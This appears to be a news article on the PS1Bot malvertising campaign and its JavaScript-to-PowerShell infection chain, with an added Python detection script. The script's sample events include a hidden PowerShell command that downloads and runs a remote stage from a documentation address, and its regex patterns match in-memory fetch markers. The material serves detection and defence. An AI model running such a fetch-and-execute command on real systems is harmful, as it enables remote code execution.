Cybersecurity researchers have uncovered a new and sophisticated malvertising campaign that is actively infecting users with a multi-stage malware framework known as PS1Bot. This threat, which has been active since early 2025, utilizes malvertising and search engine optimization (SEO) poisoning to deliver its initial payload. Once a victim downloads a malicious compressed archive, a JavaScript payload inside the ZIP file initiates a series of events, leading to the execution of a PowerShell script. This script acts as the core component, reaching out to a command-and-control (C2) server to fetch further modules, each designed for a specific malicious purpose.
PS1Bot is characterized by its modular design, allowing threat actors to deploy various functionalities on compromised systems as needed. The malware is designed with stealth as a priority: the follow-on modules fetched from the C2 server are executed in memory rather than written to disk, which limits the forensic artifacts left on the victim's machine (the initial PowerShell loader itself is still written to disk, as described below). Researchers from Cisco Talos have identified several modules, including an information stealer, a keylogger, a screen capture tool, and a wallet grabber. The information stealer, in particular, is highly targeted, using embedded wordlists to find files containing passwords and cryptocurrency wallet seed phrases. This modularity offers significant flexibility, enabling attackers to rapidly update or add new capabilities to the malware.
The campaign and the PS1Bot malware show notable overlaps with previously documented cyber threats, suggesting a connection to known threat actor groups. PS1Bot shares technical similarities with AHK Bot, an AutoHotkey-based malware previously used by groups like Asylum Ambuscade and TA866. Furthermore, this activity cluster has been linked to prior ransomware campaigns that utilized a malware called Skitnet (also known as Bossnet). These connections indicate that the actors behind PS1Bot may be experienced and are likely leveraging their existing toolkit and tactics to expand their malicious operations, including data theft and establishing remote control over infected hosts.
The initial infection vector typically starts with a user encountering a malicious ad or a poisoned search result and being tricked into downloading a ZIP file. The JavaScript payload within this archive fetches and executes a scriptlet from an external server, which in turn writes a PowerShell script to disk and runs it. Once active, this script establishes communication with the C2 server to download and execute additional PowerShell code. Because new modules are fetched on demand, the attackers can extend the malware's functionality at any time, performing actions from simple system reconnaissance to highly invasive data theft, while a dedicated component works to maintain persistent access to the compromised machine. For defenders, the chain described here is itself the most reliable detection opportunity: a Windows script host (wscript.exe or cscript.exe) launching a .js file from a user-writable location such as Downloads or Temp, followed by a child powershell.exe whose command line hides the window and downloads and evaluates content in memory, is a sequence that legitimate software almost never produces.
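The following detection logic is an added example written for this article; it is not Cisco Talos code and not taken from PS1Bot itself. It encodes the infection chain described in the two paragraphs above (ZIP, JavaScript run by a script host, PowerShell loader, in-memory fetch of further modules) as correlation rules over process-creation events. The events are constructed to resemble Sysmon Event ID 1 records, and every path, PID, hostname and command line in them is an assumption for illustration, not an observed PS1Bot indicator.

```python
"""Process-chain detection for a PS1Bot-style malvertising infection.

Added example, not the article's or Cisco Talos' code. The sample events
are constructed; paths, PIDs and the 192.0.2.10 documentation address are
assumptions, not real indicators from the campaign.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    pid: int
    ppid: int
    image: str     # full path of the executable
    cmdline: str   # full command line


SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")

# Script file launched from a user-writable directory (where an extracted ZIP lands).
SCRIPT_EXT = re.compile(r"\.(js|jse|wsf|vbs)\b", re.I)
USER_WRITABLE = re.compile(r"\\(Downloads|Temp|AppData\\Local\\Temp)\\", re.I)

# Fetch-and-evaluate markers typical of an in-memory PowerShell stager.
# None of these is malicious alone; they are scored together with context.
INMEM = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|net\.webclient|"
    r"invoke-webrequest|\biwr\b|-enc(odedcommand)?\b|frombase64string)",
    re.I,
)
# Switches used to keep the loader quiet.
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-noni(nteractive)?\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list[ProcEvent]) -> list[dict]:
    """Return findings as dicts with rule, pid and severity.

    Stage 1 flags script hosts running a script from a user-writable path.
    Stage 2 flags PowerShell that is a child of a script host and/or shows
    hidden-window plus in-memory-fetch markers; a PowerShell child of an
    already flagged script host is rated high, since that is the full chain.
    """
    by_pid = {e.pid: e for e in events}
    findings: list[dict] = []
    flagged_hosts: set[int] = set()

    for e in events:
        if (basename(e.image) in SCRIPT_HOSTS
                and SCRIPT_EXT.search(e.cmdline)
                and USER_WRITABLE.search(e.cmdline)):
            flagged_hosts.add(e.pid)
            findings.append({"rule": "script_host_from_user_dir",
                             "pid": e.pid, "severity": "medium"})

    for e in events:
        if basename(e.image) not in POWERSHELL:
            continue
        parent = by_pid.get(e.ppid)
        if parent is not None and basename(parent.image) in SCRIPT_HOSTS:
            sev = "high" if e.ppid in flagged_hosts else "medium"
            findings.append({"rule": "powershell_child_of_script_host",
                             "pid": e.pid, "severity": sev})
        inmem = INMEM.search(e.cmdline) is not None
        hidden = HIDDEN.search(e.cmdline) is not None
        if inmem and hidden:
            findings.append({"rule": "powershell_inmemory_fetch",
                             "pid": e.pid, "severity": "high"})
        elif inmem:
            findings.append({"rule": "powershell_download_marker",
                             "pid": e.pid, "severity": "low"})
    return findings


# Constructed sample: one malicious chain (PIDs 100 -> 200) plus two benign
# look-alikes (an admin script under ProgramData, a vendor VBS under Program Files).
SAMPLE_EVENTS = [
    ProcEvent(50, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(100, 50, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\invoice_2025\Invoice.js"'),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://192.0.2.10/stage2')\""),
    ProcEvent(300, 60, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r"-ExecutionPolicy Bypass -File C:\ProgramData\Scripts\inventory.ps1"),
    ProcEvent(400, 70, r"C:\Windows\System32\cscript.exe",
              r'"C:\Windows\System32\cscript.exe" "C:\Program Files\Vendor\healthcheck.vbs"'),
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['severity']:6} pid={f['pid']:<4} {f['rule']}")
```

Run against the constructed sample, the script host (PID 100) and its PowerShell child (PID 200) are flagged and the two benign events produce nothing; the parent-child link is what turns two medium signals into a high-confidence chain, which is why the rules correlate on PPID instead of matching command lines in isolation. In a real deployment the same logic maps onto a SIEM join between Sysmon Event ID 1 records, and PowerShell script block logging (Event ID 4104) would additionally expose the module bodies that never touch disk.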
This disclosure about the PS1Bot campaign comes as Google announced its use of AI and large language models (LLMs) to combat invalid traffic (IVT) and deceptive ad practices. Google’s new AI-powered systems are designed to analyze ad placements, app and web content, and user interactions to more precisely identify invalid behaviors. The company claims these new applications have already led to a 40% reduction in IVT stemming from deceptive ad serving practices. While Google’s efforts are focused on improving ad quality and safety, the discovery of the PS1Bot campaign highlights the ongoing and evolving challenge of malvertising and the sophisticated techniques threat actors are employing to bypass security measures.